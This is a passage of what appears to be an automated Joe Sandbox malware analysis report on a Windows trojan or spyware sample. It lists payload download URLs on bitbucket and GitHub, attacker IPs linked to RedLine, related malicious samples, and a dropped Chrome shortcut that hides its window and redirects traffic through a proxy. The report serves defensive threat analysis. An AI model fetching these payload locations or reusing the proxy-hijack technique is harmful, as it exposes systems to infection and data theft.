                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735powershell.exe, 00000004.00000002.2356536853.00000158A912F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.0000011694600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009259281.000001169468B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009178942.00000116945F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.000001169A611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009611502.00000116948E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2113417744.00000000058C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://raw.githubusercontent.compowershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.cookielaw.org/powershell.exe, 00000006.00000002.2009787604.00000116963CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id10RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id11RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id12RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id13RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id14RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id15RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id16RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id17RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id18RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Entity/Id19RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          52.216.210.153
                          		s3-w.us-east-1.amazonaws.comUnited States
                          		16509AMAZON-02USfalse
                          185.196.9.26
                          		unknownSwitzerland
                          		42624SIMPLECARRIERCHtrue
                          185.199.109.133
                          		raw.githubusercontent.comNetherlands
                          		54113FASTLYUStrue
                          185.166.143.49
                          		bitbucket.orgGermany
                          		16509AMAZON-02UStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519351
                          Start date and time:2024-09-26 12:15:10 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 57s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:sRMytgfRpJ.exe
                          renamed because original name is a hash value
                          Original Sample Name:51c009abf871216f8d9e40cdd785ce6c.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@14/13@3/4
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 170
                          • Number of non-executed functions: 29
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target RegAsm.exe, PID 8044 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: sRMytgfRpJ.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          06:16:18API Interceptor47x Sleep call for process: powershell.exe modified
                          06:16:39API Interceptor11x Sleep call for process: RegAsm.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          52.216.210.153https://tiktokshop.cash/wapGet hashmaliciousUnknownBrowse
                            185.196.9.26HotYVOv1.exeGet hashmaliciousRedLineBrowse
                              sloppyCatsV1.exeGet hashmaliciousRedLineBrowse
                                UltraViolince.exeGet hashmaliciousRedLineBrowse
                                  GTA 5 Mod Menu.exeGet hashmaliciousRedLineBrowse
                                    GTA 5 Mod Menu.exeGet hashmaliciousRedLineBrowse
                                      UIExecutor.exeGet hashmaliciousRedLineBrowse
                                        i0OvRpJuq7.exeGet hashmaliciousRedLineBrowse
                                          IrisKevin533Rachel.lib.exeGet hashmaliciousRedLineBrowse
                                            Loader.exeGet hashmaliciousRedLineBrowse
                                              d3d9x.dllGet hashmaliciousRedLineBrowse
                                                185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                185.166.143.49https://sydlegal001.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                  2plugin27724.exeGet hashmaliciousXmrigBrowse
                                                    UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                      https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                                        sostener.vbsGet hashmaliciousRemcosBrowse
                                                          Crpted.vbsGet hashmaliciousUnknownBrowse
                                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                                              remittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                ExeFile (71).exeGet hashmaliciousUnknownBrowse
                                                                  xKCGmDmnB1.exeGet hashmaliciousLummaCBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    s3-w.us-east-1.amazonaws.comhttp://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 52.216.56.153
                                                                    http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.229.145
                                                                    https://tkshopax1.cc/Get hashmaliciousUnknownBrowse
                                                                    • 16.15.176.192
                                                                    https://tiktok-shopsxx.top/Get hashmaliciousUnknownBrowse
                                                                    • 3.5.31.10
                                                                    envifa.vbsGet hashmaliciousUnknownBrowse
                                                                    • 52.216.57.225
                                                                    https://tkclub1.com/Get hashmaliciousUnknownBrowse
                                                                    • 3.5.28.99
                                                                    http://wholesale-tiktok.shop/Get hashmaliciousPhisherBrowse
                                                                    • 3.5.25.85
                                                                    https://tkmallj.top/Get hashmaliciousUnknownBrowse
                                                                    • 52.216.153.20
                                                                    https://tiktokity.com/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.163.193
                                                                    https://ddhhgvu.top/Get hashmaliciousUnknownBrowse
                                                                    • 52.217.204.113
                                                                    raw.githubusercontent.comhttp://frt.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.109.133
                                                                    https://gungnir-interface-test.pages.dev/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    https://fastsoluudapppmigratee.com/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                                                    • 185.199.111.133
                                                                    SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                    • 185.199.109.133
                                                                    batman.ps1Get hashmaliciousUnknownBrowse
                                                                    • 185.199.110.133
                                                                    t1RVQb98yT.exeGet hashmaliciousS400 RATBrowse
                                                                    • 185.199.110.133
                                                                    9Jvb8f4R5m.exeGet hashmaliciousS400 RATBrowse
                                                                    • 185.199.108.133
                                                                    https://aptos-web-git-chore-shows-the-staking-token-website.pancake.run/farmsGet hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    https://aptos-web-git-aptos-pool.pancake.run/farmsGet hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    bitbucket.orgenvifa.vbsGet hashmaliciousUnknownBrowse
                                                                    • 185.166.143.48
                                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                                    • 185.166.143.50
                                                                    S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                    • 185.166.143.50
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                    • 185.166.143.48
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                    • 185.166.143.50
                                                                    file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                    • 185.166.143.50
                                                                    https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                                    • 185.166.143.48
                                                                    HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                                                    • 185.166.143.50
                                                                    SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                    • 185.166.143.50
                                                                    Leer documentos confidenciales anexos por parte de la Corte Suprema De Justicia.vbsGet hashmaliciousUnknownBrowse
                                                                    • 185.166.143.48

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    SIMPLECARRIERCHzrOUNP9gMJ.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                    • 185.196.10.235
                                                                    Or3dzp4vB1.exeGet hashmaliciousXWormBrowse
                                                                    • 185.196.10.235
                                                                    KAV3vJud90.exeGet hashmaliciousDarkVision RatBrowse
                                                                    • 185.196.10.235
                                                                    updater.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                    • 185.196.11.237
                                                                    HotYVOv1.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.196.9.26
                                                                    VtkzI2DleKAWijQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 185.196.9.150
                                                                    sloppyCatsV1.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.196.9.26
                                                                    UltraViolince.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.196.9.26
                                                                    GTA 5 Mod Menu.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.196.9.26
                                                                    GTA 5 Mod Menu.exeGet hashmaliciousRedLineBrowse
                                                                    • 185.196.9.26
                                                                    FASTLYUSg3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                                    • 151.101.192.176
                                                                    https://t.co/gYSeG2q7l2Get hashmaliciousUnknownBrowse
                                                                    • 199.232.188.159
                                                                    HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                                                    • 151.101.2.137
                                                                    Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    http://frt.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.110.133
                                                                    https://sparebankno-privat.netlify.app/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    http://banlombiavirtusucursalyfgdsffg.vercel.app/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    https://docs-i-trezor.github.io/en-us/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.129.229
                                                                    http://banlombiasucursalvirtughasd.vercel.app/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.111.133
                                                                    http://cancelarcompravirtusucursajgbf-9mfi.vercel.app/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    AMAZON-02USg3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                                    • 13.32.99.92
                                                                    https://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 76.76.21.22
                                                                    https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.98
                                                                    eMoS6hG54p.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.252.114
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.228.54.207
                                                                    http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.203.153
                                                                    http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                                    • 52.219.128.16
                                                                    https://tkshopax1.cc/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.229.193
                                                                    AMAZON-02USg3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                                    • 13.32.99.92
                                                                    https://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 76.76.21.22
                                                                    https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                                                    • 76.76.21.98
                                                                    eMoS6hG54p.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.252.114
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.228.54.207
                                                                    http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.203.153
                                                                    http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                                                                    • 52.219.128.16
                                                                    https://tkshopax1.cc/Get hashmaliciousUnknownBrowse
                                                                    • 54.231.229.193

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0enBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133
                                                                    RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 52.216.210.153
                                                                    • 185.166.143.49
                                                                    • 185.199.109.133

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\Public\Desktop\Google Chrome.lnk

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:37 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2104
                                                                    Entropy (8bit):3.456537717214464
                                                                    Encrypted:false
                                                                    SSDEEP:48:8Spd+cTeAT7RYrnvPdAKRkdAGdAKRFdAKR/U:8S6cSt
                                                                    MD5:87B650435276D97642F8B292884DEA7C
                                                                    SHA1:7FE32EE2A7772A4118FDFB23C0394693EFD3697C
                                                                    SHA-256:A219977F7817CD4E9E520A2EB52FA98BC08C241D781962207C2191EC600ED733
                                                                    SHA-512:D95CCC0BC0CC5DB2ED93FB7130096158D13DB464B9ACCDD7BB14CC372AFF2F40FA3226D8E868F9EBB4B516718D1413FB036829E4F01E590C6447377CA36B5739
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ......,.............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWS`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWS`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWS`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWJ`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3274
                                                                    Entropy (8bit):5.3318368586986695
                                                                    Encrypted:false
                                                                    SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                    MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                    SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                    SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                    SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllulf66llp:NllUSOl
                                                                    MD5:B798C92691636A7830BE142C313C0E72
                                                                    SHA1:53C2A97D145573705355A8C39757DB8009D116CC
                                                                    SHA-256:5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
                                                                    SHA-512:6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:@...e................................................@..........

                                                                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\sRMytgfRpJ.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):17422
                                                                    Entropy (8bit):5.438010053566963
                                                                    Encrypted:false
